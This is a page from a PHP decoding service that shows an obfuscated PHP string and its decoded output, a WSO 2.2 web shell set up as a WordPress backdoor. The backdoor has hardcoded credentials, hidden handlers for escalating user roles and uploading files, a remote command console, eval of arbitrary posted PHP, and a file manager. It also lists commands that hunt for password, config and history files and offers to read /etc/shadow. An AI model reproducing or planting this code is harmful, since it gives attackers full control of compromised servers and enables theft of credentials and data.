Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $c='1b1rW9tIEij8OfM88x8UDTuyJ8bYBrIBxxDumBAgmFsIvF5Zlm3FsqSRZIyT5b+/VdXdUkuWjcnM7Dln..

Decoded Output download


error_reporting(0);
$my_keyw = 'wp2810';
$my_keyw_for_exp = 'wp2810c';
$admin_name='admin';
$admin_pass='WP2810';

if(isset($_GET[$my_keyw]) || isset($_POST[$my_keyw]))
{
if ((!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!=$admin_name || $_SERVER['PHP_AUTH_PW']!=$admin_pass) && !eregi('cgi',PHP_SAPI))
   {
   header("WWW-Authenticate: Basic realm=\"WSO\"");
   header("HTTP/1.0 401 Unauthorized");
   exit('Access Denied');
   }

if(isset($_GET['ping']) || isset($_POST['ping'])){echo "Welcome to the world of dorkness! WPL1.0";exit;}
if(isset($_POST['unm'])){
 $my_user=get_userdatabylogin(urldecode($_POST['unm']));
 $user = new WP_User($my_user->ID);
 $user->set_role(urldecode($_POST['urole']));
 $new_role=$user->roles;
 $rq.="////Role: ".$new_role[0]."////";
 exit;
}
if(isset($_POST['f'])){
 $nm=str_replace("\","/",dirname(__FILE__))."/".$_POST['f'];
 if(move_uploaded_file($_FILES["fl"]["tmp_name"],"$nm"))echo "////$nm////";
 exit;
}

$color = "#df5";
$default_action = 'FilesMan';
@define('SELF_PATH', __FILE__);
@session_start();
@error_reporting(0);
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('VERSION', '2.2');
if( get_magic_quotes_gpc() ) {
	function stripslashes_array($array) {
		return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
	}
	$_POST = stripslashes_array($_POST);
}
 if( strtolower( substr(PHP_OS,0,3) ) == "win" ) $os = 'win'; else $os = 'nix'; $safe_mode = @ini_get('safe_mode'); $disable_functions = @ini_get('disable_functions'); $home_cwd = @getcwd(); if( isset( $_POST['c'] ) ) @chdir($_POST['c']); $cwd = @getcwd(); if( $os == 'win') { $home_cwd = str_replace("\", "/", $home_cwd); $cwd = str_replace("\", "/", $cwd); } if( $cwd[strlen($cwd)-1] != '/' ) $cwd .= '/'; if($os == 'win') $aliases = array( "List Directory" => "dir", "Find index.php in current dir" => "dir /s /w /b index.php", "Find *config*.php in current dir" => "dir /s /w /b *config*.php", "Show active connections" => "netstat -an", "Show running services" => "net start", "User accounts" => "net user", "Show computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all" ); else $aliases = array( "List dir" => "ls -la", "list file attributes on a Linux second extended file system" => "lsattr -va", "show opened ports" => "netstat -an | grep -i listen", "Find" => "", "find all suid files" => "find / -type f -perm -04000 -ls", "find suid files in current dir" => "find . -type f -perm -04000 -ls", "find all sgid files" => "find / -type f -perm -02000 -ls", "find sgid files in current dir" => "find . -type f -perm -02000 -ls", "find config.inc.php files" => "find / -type f -name config.inc.php", "find config* files" => "find / -type f -name \"config*\"", "find config* files in current dir" => "find . -type f -name \"config*\"", "find all writable folders and files" => "find / -perm -2 -ls", "find all writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", "Locate" => "", "locate httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf", "locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" =>"locate admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate config.php", "locate config.inc files" => "locate config.inc", "locate config.inc.php" => "locate config.inc.php", "locate config.default.php files" => "locate config.default.php", "locate config* files " => "locate config", "locate .conf files"=>"locate '.conf'", "locate .pwd files" => "locate '.pwd'", "locate .sql files" => "locate '.sql'", "locate .htpasswd files" => "locate '.htpasswd'", "locate .bash_history files" => "locate '.bash_history'", "locate .mysql_history files" => "locate '.mysql_history'", "locate .fetchmailrc files" => "locate '.fetchmailrc'", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv" ); function printHeader() { if(empty($_POST['charset'])) $_POST['charset'] = "UTF-8"; global $color; ?>
<html><head><meta http-equiv='Content-Type' content='text/html; charset=<?php echo $_POST['charset']?>'><title><?php echo $_SERVER['HTTP_HOST']?> - WSO <?php echo VERSION?></title>
<style>
body{background-color:#444;color:#e1e1e1;}
body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }
table.info{ color:#fff;background-color:#222; }
span,h1,a{ color:<?php echo $color?> !important; }
span{ font-weight: bolder; }
h1{ border-left:5px solid <?php echo $color?>;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }
div.content{ padding: 5px;margin-left:5px;background-color:#333; }
a{ text-decoration:none; }
a:hover{ text-decoration:underline; }
.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
.bigarea{ width:100%;height:250px; }
input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid <?php echo $color?>; font: 9pt Monospace,"Courier New"; }
form{ margin:0px; }
#toolsTbl{ text-align:center; }
.toolsInp{ width: 300px }
.main th{text-align:left;background-color:#5e5e5e;}
.main tr:hover{background-color:#5e5e5e}
.l1{background-color:#444}
pre{font-family:Courier,Monospace;}
</style>
<script>
	var c_ = '<?php echo htmlspecialchars($GLOBALS['cwd'])?>';
	var a_ = '<?php echo htmlspecialchars(@$_POST['a'])?>';
	var p1_ = '<?php echo (strpos(@$_POST['p1'],"
")!==false)?'':addslashes(htmlspecialchars(@$_POST['p1']))?>';
	var p2_ = '<?php echo (strpos(@$_POST['p2'],"
")!==false)?'':addslashes(htmlspecialchars(@$_POST['p2']))?>';
	var p3_ = '<?php echo (strpos(@$_POST['p3'],"
")!==false)?'':addslashes(htmlspecialchars(@$_POST['p3']))?>';
	var charset_ = '<?php echo htmlspecialchars(@$_POST['charset'])?>';
	function set(a,c,p1,p2,p3,charset) {
		if(a != null)document.mf.a.value=a;else document.mf.a.value=a_;
		if(c != null)document.mf.c.value=c;else document.mf.c.value=c_;
		if(p1 != null)document.mf.p1.value=p1;else document.mf.p1.value=p1_;
		if(p2 != null)document.mf.p2.value=p2;else document.mf.p2.value=p2_;
		if(p3 != null)document.mf.p3.value=p3;else document.mf.p3.value=p3_;
		if(charset != null)document.mf.charset.value=charset;else document.mf.charset.value=charset_;
	}
	function g(a,c,p1,p2,p3,charset) {
		set(a,c,p1,p2,p3,charset);
		document.mf.submit();
	}
	function a(a,c,p1,p2,p3,charset) {
		set(a,c,p1,p2,p3,charset);
		var params = "ajax=true";
		for(i=0;i<document.mf.elements.length;i++)
			params += "&"+document.mf.elements[i].name+"="+encodeURIComponent(document.mf.elements[i].value);
		sr('<?php echo $_SERVER['REQUEST_URI'];?>', params);
	}
	function sr(url, params) {
		if (window.XMLHttpRequest) {
			req = new XMLHttpRequest();
			req.onreadystatechange = processReqChange;
			req.open("POST", url, true);
			req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
			req.send(params);
		}
		else if (window.ActiveXObject) {
			req = new ActiveXObject("Microsoft.XMLHTTP");
			if (req) {
				req.onreadystatechange = processReqChange;
				req.open("POST", url, true);
				req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
				req.send(params);
			}
		}
	}
	function processReqChange() {
		if( (req.readyState == 4) )
			if(req.status == 200) {
				var reg = new RegExp("(\d+)([\S\s]*)", "m");
				var arr=reg.exec(req.responseText);
				eval(arr[2].substr(0, arr[1]));
			}
			else alert("Request error!");
	}
</script>
<head><body><div style="position:absolute;width:100%;background-color:#444;top:0;left:0;">
<form method=post name=mf style='display:none;'>
<input type=hidden name=a>
<input type=hidden name=c>
<input type=hidden name=p1>
<input type=hidden name=p2>
<input type=hidden name=p3>
<input type=hidden name=charset>
</form>
<?php
 $freeSpace = @diskfreespace($GLOBALS['cwd']); $totalSpace = @disk_total_space($GLOBALS['cwd']); $totalSpace = $totalSpace?$totalSpace:1; $release = @php_uname('r'); $kernel = @php_uname('s'); $millink='http://milw0rm.com/search.php?dong='; if( strpos('Linux', $kernel) !== false ) $millink .= urlencode( 'Linux Kernel ' . substr($release,0,6) ); else $millink .= urlencode( $kernel . ' ' . substr($release,0,3) ); if(!function_exists('posix_getegid')) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(@posix_geteuid()); $gid = @posix_getgrgid(@posix_getegid()); $user = $uid['name']; $uid = $uid['uid']; $group = $gid['name']; $gid = $gid['gid']; } $cwd_links = ''; $path = explode("/", $GLOBALS['cwd']); $n=count($path); for($i=0;$i<$n-1;$i++) { $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\""; for($j=0;$j<=$i;$j++) $cwd_links .= $path[$j].'/'; $cwd_links .= "\")'>".$path[$i]."/</a>"; } $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866'); $opt_charsets = ''; foreach($charsets as $item) $opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>'; $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Sql'=>'Sql','Php'=>'Php','Safe mode'=>'SafeMode','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network'); if(!empty($GLOBALS['auth_pass'])) $m['Logout'] = 'Logout'; $m['Self remove'] = 'SelfRemove'; $menu = ''; foreach($m as $k => $v) $menu .= '<th width="'.(int)(100/count($m)).'%">[ <a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a> ]</th>'; $drives = ""; if ($GLOBALS['os'] == 'win') { foreach( range('c','z') as $drive ) if (is_dir($drive.':\')) $drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> '; } echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:'.($GLOBALS['os'] == 'win'?'<br>Drives:':'').'</span></td>'. '<td><nobr>'.substr(@php_uname(), 0, 120).'  <a href="http://www.google.com/search?q='.urlencode(@php_uname()).'" target="_blank">[Google]</a> <a href="'.$millink.'" target=_blank>[milw0rm]</a></nobr><br>'.$uid.' ( '.$user.' ) <span>Group:</span> '.$gid.' ( '.$group.' )<br>'.@phpversion().' <span>Safe mode:</span> '.($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=#00bb00><b>OFF</b></font>').' <a href=# onclick="g(\'Php\',null,null,\'info\')">[ phpinfo ]</a> <span>Datetime:</span> '.date('Y-m-d H:i:s').'<br>'.viewSize($totalSpace).' <span>Free:</span> '.viewSize($freeSpace).' ('.(int)($freeSpace/$totalSpace*100).'%)<br>'.$cwd_links.' '.viewPermsColor($GLOBALS['cwd']).' <a href=# onclick="g(\'FilesMan\',\''.$GLOBALS['home_cwd'].'\',\'\',\'\',\'\')">[ home ]</a><br>'.$drives.'</td>'. '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">'.$opt_charsets.'</optgroup></select><br><span>Server IP:</span><br>'.gethostbyname($_SERVER["HTTP_HOST"]).'<br><span>Client IP:</span><br>'.$_SERVER['REMOTE_ADDR'].'</nobr></td></tr></table>'. '<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>'.$menu.'</tr></table><div style="margin:5">'; } function printFooter() { $is_writable = is_writable($GLOBALS['cwd'])?"<font color=green>[ Writeable ]</font>":"<font color=red>[ Not writable ]</font>"; ?>
</div>
<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%  style="border-top:2px solid #333;border-bottom:2px solid #333;">
	<tr>
		<td><form onsubmit="g(null,this.c.value);return false;"><span>Change dir:</span><br><input class="toolsInp" type=text name=c value="<?php echo htmlspecialchars($GLOBALS['cwd']);?>"><input type=submit value=">>"></form></td>
		<td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form></td>
	</tr>
	<tr>
		<td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span><br><input class="toolsInp" type=text name=d><input type=submit value=">>"></form><?php echo $is_writable?></td>
		<td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form><?php echo $is_writable?></td>
	</tr>
	<tr>
		<td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class="toolsInp" type=text name=c value=""><input type=submit value=">>"></form></td>
		<td><form method='post' ENCTYPE='multipart/form-data'>
		<input type=hidden name=a value='FilesMAn'>
		<input type=hidden name=c value='<?php echo htmlspecialchars($GLOBALS['cwd'])?>'>
		<input type=hidden name=p1 value='uploadFile'>
		<input type=hidden name=charset value='<?php echo isset($_POST['charset'])?$_POST['charset']:''?>'>
		<span>Upload file:</span><br><input class="toolsInp" type=file name=f><input type=submit value=">>"></form><?php echo $is_writable?></td>
	</tr>

</table>
</div>
</body></html>
<?php
} if ( !function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false) ) { function posix_getpwuid($p) { return false; } } if ( !function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false) ) { function posix_getgrgid($p) { return false; } } function ex($in) { $out = ''; if(function_exists('exec')) { @exec($in,$out); $out = @join("
",$out); }elseif(function_exists('passthru')) { ob_start(); @passthru($in); $out = ob_get_clean(); }elseif(function_exists('system')) { ob_start(); @system($in); $out = ob_get_clean(); }elseif(function_exists('shell_exec')) { $out = shell_exec($in); }elseif(is_resource($f = @popen($in,"r"))) { $out = ""; while(!@feof($f)) $out .= fread($f,1024); pclose($f); } return $out; } function viewSize($s) { if($s >= 1073741824) return sprintf('%1.2f', $s / 1073741824 ). ' GB'; elseif($s >= 1048576) return sprintf('%1.2f', $s / 1048576 ) . ' MB'; elseif($s >= 1024) return sprintf('%1.2f', $s / 1024 ) . ' KB'; else return $s . ' B'; } function perms($p) { if (($p & 0xC000) == 0xC000)$i = 's'; elseif (($p & 0xA000) == 0xA000)$i = 'l'; elseif (($p & 0x8000) == 0x8000)$i = '-'; elseif (($p & 0x6000) == 0x6000)$i = 'b'; elseif (($p & 0x4000) == 0x4000)$i = 'd'; elseif (($p & 0x2000) == 0x2000)$i = 'c'; elseif (($p & 0x1000) == 0x1000)$i = 'p'; else $i = 'u'; $i .= (($p & 0x0100) ? 'r' : '-'); $i .= (($p & 0x0080) ? 'w' : '-'); $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-')); $i .= (($p & 0x0020) ? 'r' : '-'); $i .= (($p & 0x0010) ? 'w' : '-'); $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-')); $i .= (($p & 0x0004) ? 'r' : '-'); $i .= (($p & 0x0002) ? 'w' : '-'); $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-')); return $i; } function viewPermsColor($f) { if (!@is_readable($f)) return '<font color=#FF0000><b>'.perms(@fileperms($f)).'</b></font>'; elseif (!@is_writable($f)) return '<font color=white><b>'.perms(@fileperms($f)).'</b></font>'; else return '<font color=#00BB00><b>'.perms(@fileperms($f)).'</b></font>'; } if(!function_exists("scandir")) { function scandir($dir) { $dh = opendir($dir); while (false !== ($filename = readdir($dh))) { $files[] = $filename; } return $files; } } function which($p) { $path = ex('which '.$p); if(!empty($path)) return $path; return false; } function actionSecInfo() { printHeader(); echo '<h1>Server security information</h1><div class=content>'; function showSecParam($n, $v) { $v = trim($v); if($v) { echo '<span>'.$n.': </span>'; if(strpos($v, "
") === false) echo $v.'<br>'; else echo '<pre class=ml1>'.$v.'</pre>'; } } showSecParam('Server software', @getenv('SERVER_SOFTWARE')); showSecParam('Disabled PHP Functions', ($GLOBALS['disable_functions'])?$GLOBALS['disable_functions']:'none'); showSecParam('Open base dir', @ini_get('open_basedir')); showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir')); showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir')); showSecParam('cURL support', function_exists('curl_version')?'enabled':'no'); $temp=array(); if(function_exists('mysql_get_client_info')) $temp[] = "MySql (".mysql_get_client_info().")"; if(function_exists('mssql_connect')) $temp[] = "MSSQL"; if(function_exists('pg_connect')) $temp[] = "PostgreSQL"; if(function_exists('oci_connect')) $temp[] = "Oracle"; showSecParam('Supported databases', implode(', ', $temp)); echo '<br>'; if( $GLOBALS['os'] == 'nix' ) { $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl'); $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja'); $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror'); showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no'); showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"etc\", \"shadow\")'>[view]</a>":'no'); showSecParam('OS version', @file_get_contents('/proc/version')); showSecParam('Distr name', @file_get_contents('/etc/issue.net')); if(!$GLOBALS['safe_mode']) { echo '<br>'; $temp=array(); foreach ($userful as $item) if(which($item)){$temp[]=$item;} showSecParam('Userful', implode(', ',$temp)); $temp=array(); foreach ($danger as $item) if(which($item)){$temp[]=$item;} showSecParam('Danger', implode(', ',$temp)); $temp=array(); foreach ($downloaders as $item) if(which($item)){$temp[]=$item;} showSecParam('Downloaders', implode(', ',$temp)); echo '<br/>'; showSecParam('Hosts', @file_get_contents('/etc/hosts')); showSecParam('HDD space', ex('df -h')); showSecParam('Mount options', @file_get_contents('/etc/fstab')); } } else { showSecParam('OS Version',ex('ver')); showSecParam('Account Settings',ex('net accounts')); showSecParam('User Accounts',ex('net user')); } echo '</div>'; printFooter(); } function actionPhp() { if( isset($_POST['ajax']) ) { $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true; ob_start(); eval($_POST['p1']); $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"

	\'")."';
"; echo strlen($temp), "
", $temp; exit; } printHeader(); if( isset($_POST['p2']) && ($_POST['p2'] == 'info') ) { echo '<h1>PHP info</h1><div class=content><style>.p {color:#000;}</style>'; ob_start(); phpinfo(); $tmp = ob_get_clean(); $tmp = preg_replace('!body {.*}!msiU','',$tmp); $tmp = preg_replace('!a:\w+ {.*}!msiU','',$tmp); $tmp = preg_replace('!h1!msiU','h2',$tmp); $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp); $tmp = preg_replace('!body, td, th, h2, h2 {.*}!msiU','',$tmp); echo $tmp; echo '</div><br>'; } if(empty($_POST['ajax'])&&!empty($_POST['p1'])) @$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false; echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(\'Php\',null,this.code.value);}else{g(\'Php\',null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><input type=submit value=Eval style="margin-top:5px">'; echo ' <input type=checkbox name=ajax value=1 '.(@$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>'; if(!empty($_POST['p1'])) { ob_start(); eval($_POST['p1']); echo htmlspecialchars(ob_get_clean()); } echo '</pre></div>'; printFooter(); } function actionFilesMan() { printHeader(); echo '<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>'; if(!empty($_POST['p1'])) { switch($_POST['p1']) { case 'uploadFile': if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name'])) echo "Can't upload file!"; break; case 'mkdir': if(!@mkdir($_POST['p2'])) echo "Can't create new dir"; break; case 'delete': function deleteDir($path) { $path = (substr($path,-1)=='/') ? $path:$path.'/'; $dh = opendir($path); while ( ($item = readdir($dh) ) !== false) { $item = $path.$item; if ( (basename($item) == "..") || (basename($item) == ".") ) continue; $type = filetype($item); if ($type == "dir") deleteDir($item); else @unlink($item); } closedir($dh); rmdir($path); } if(is_array(@$_POST['f'])) foreach($_POST['f'] as $f) { $f = urldecode($f); if(is_dir($f)) deleteDir($f); else @unlink($f); } break; case 'paste': if($_SESSION['act'] == 'copy') { function copy_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s); $h = @opendir($c.$s); while (($f = @readdir($h)) !== false) if (($f != ".") and ($f != "..")) { copy_paste($c.$s.'/',$f, $d.$s.'/'); } } elseif(is_file($c.$s)) { @copy($c.$s, $d.$s); } } foreach($_SESSION['f'] as $f) copy_paste($_SESSION['c'],$f, $GLOBALS['cwd']); } elseif($_SESSION['act'] == 'move') { function move_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s); $h = @opendir($c.$s); while (($f = @readdir($h)) !== false) if (($f != ".") and ($f != "..")) { copy_paste($c.$s.'/',$f, $d.$s.'/'); } } elseif(@is_file($c.$s)) { @copy($c.$s, $d.$s); } } foreach($_SESSION['f'] as $f) @rename($_SESSION['c'].$f, $GLOBALS['cwd'].$f); } elseif($_SESSION['act'] == 'zip') { if(class_exists('ZipArchive')) eval(base64_decode('JHppcCA9IG5ldyBaaXBBcmNoaXZlOw0KaWYgKCR6aXAtPm9wZW4oJ3dzb18nLmRhdGUoIlltZF9IaXMiKS4nLnppcCcsIFppcEFyY2hpdmU6OkNSRUFURSkpIHsNCgljaGRpcigkX1NFU1NJT05bJ2MnXSk7DQoJZm9yZWFjaCgkX1NFU1NJT05bJ2YnXSBhcyAkZikgew0KCQlpZihAaXNfZmlsZSgkX1NFU1NJT05bJ2MnXS4kZikpDQoJCQkkemlwLT5hZGRGaWxlKCRfU0VTU0lPTlsnYyddLiRmLCAkZik7DQoJCWVsc2VpZihAaXNfZGlyKCRfU0VTU0lPTlsnYyddLiRmKSkgew0KCQkJJGl0ZXJhdG9yID0gbmV3IFJlY3Vyc2l2ZUl0ZXJhdG9ySXRlcmF0b3IobmV3IFJlY3Vyc2l2ZURpcmVjdG9yeUl0ZXJhdG9yKCRmLicvJykpOw0KCQkJZm9yZWFjaCAoJGl0ZXJhdG9yIGFzICRrZXk9PiR2YWx1ZSkgew0KCQkJCSR6aXAtPmFkZEZpbGUocmVhbHBhdGgoJGtleSksICRrZXkpOw0KCQkJfQ0KCQl9DQoJfQ0KCWNoZGlyKCRHTE9CQUxTWydjd2QnXSk7DQoJJHppcC0+Y2xvc2UoKTsNCn0=')); } elseif($_SESSION['act'] == 'unzip') { if(class_exists('ZipArchive')) eval(base64_decode('JHppcCA9IG5ldyBaaXBBcmNoaXZlOw0KZm9yZWFjaCgkX1NFU1NJT05bJ2YnXSBhcyAkZikgew0KCWlmKCR6aXAtPm9wZW4oJF9TRVNTSU9OWydjJ10uJGYpKSB7DQoJCSR6aXAtPmV4dHJhY3RUbygkR0xPQkFMU1snY3dkJ10pOw0KCQkkemlwLT5jbG9zZSgpOw0KCX0NCn0=')); } unset($_SESSION['f']); break; default: if(!empty($_POST['p1']) && (($_POST['p1'] == 'copy')||($_POST['p1'] == 'move')||($_POST['p1'] == 'zip')||($_POST['p1'] == 'unzip')) ) { $_SESSION['act'] = @$_POST['p1']; $_SESSION['f'] = @$_POST['f']; foreach($_SESSION['f'] as $k => $f) $_SESSION['f'][$k] = urldecode($f); $_SESSION['c'] = @$_POST['c']; } break; } } $dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']); if($dirContent === false) { echo 'Can\'t open this folder!';printFooter(); return; } global $sort; $sort = array('name', 1); if(!empty($_POST['p1'])) { if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match)) $sort = array($match[1], (int)$match[2]); } ?>
<script>
	function sa() {
		for(i=0;i<document.files.elements.length;i++)
			if(document.files.elements[i].type == 'checkbox')
				document.files.elements[i].checked = document.files.elements[0].checked;
	}
</script>
<table width='100%' class='main' cellspacing='0' cellpadding='2'>
<form name=files method=post>
<?php
 echo "<tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th></tr>"; $dirs = $files = $links = array(); $n = count($dirContent); for($i=0;$i<$n;$i++) { $ow = @posix_getpwuid(@fileowner($dirContent[$i])); $gr = @posix_getgrgid(@filegroup($dirContent[$i])); $tmp = array('name' => $dirContent[$i], 'path' => $GLOBALS['cwd'].$dirContent[$i], 'modify' => date('Y-m-d H:i:s',@filemtime($GLOBALS['cwd'].$dirContent[$i])), 'perms' => viewPermsColor($GLOBALS['cwd'].$dirContent[$i]), 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]), 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]), 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i]) ); if(@is_file($GLOBALS['cwd'].$dirContent[$i])) $files[] = array_merge($tmp, array('type' => 'file')); elseif(@is_link($GLOBALS['cwd'].$dirContent[$i])) $links[] = array_merge($tmp, array('type' => 'link')); elseif(@is_dir($GLOBALS['cwd'].$dirContent[$i])&& ($dirContent[$i] != ".")) $dirs[] = array_merge($tmp, array('type' => 'dir')); } $GLOBALS['sort'] = $sort; function cmp($a, $b) { if($GLOBALS['sort'][0] != 'size') return strcmp($a[$GLOBALS['sort'][0]], $b[$GLOBALS['sort'][0]])*($GLOBALS['sort'][1]?1:-1); else return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1); } usort($files, "cmp"); usort($dirs, "cmp"); usort($links, "cmp"); $files = array_merge($dirs, $links, $files); $l = 0; foreach($files as $f) { echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');"><b>[ '.htmlspecialchars($f['name']).' ]</b>').'</a></td><td>'.(($f['type']=='file')?viewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms'] .'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>'; $l = $l?0:1; } ?>
	<tr><td colspan=7>
	<input type=hidden name=a value='FilesMan'>
	<input type=hidden name=c value='<?php echo htmlspecialchars($GLOBALS['cwd'])?>'>
	<input type=hidden name=charset value='<?php echo isset($_POST['charset'])?$_POST['charset']:''?>'>
	<select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option><?php if(class_exists('ZipArchive')){?><option value='zip'>Compress (zip)</option><?php }?><option value='unzip'>Uncompress (zip)</option><?php if(!empty($_SESSION['act'])&&@count($_SESSION['f'])){?><option value='paste'>Paste / zip</option><?php }?></select>&nbsp;<input type="submit" value=">>"></td></tr>
	</form></table></div>
	<?php
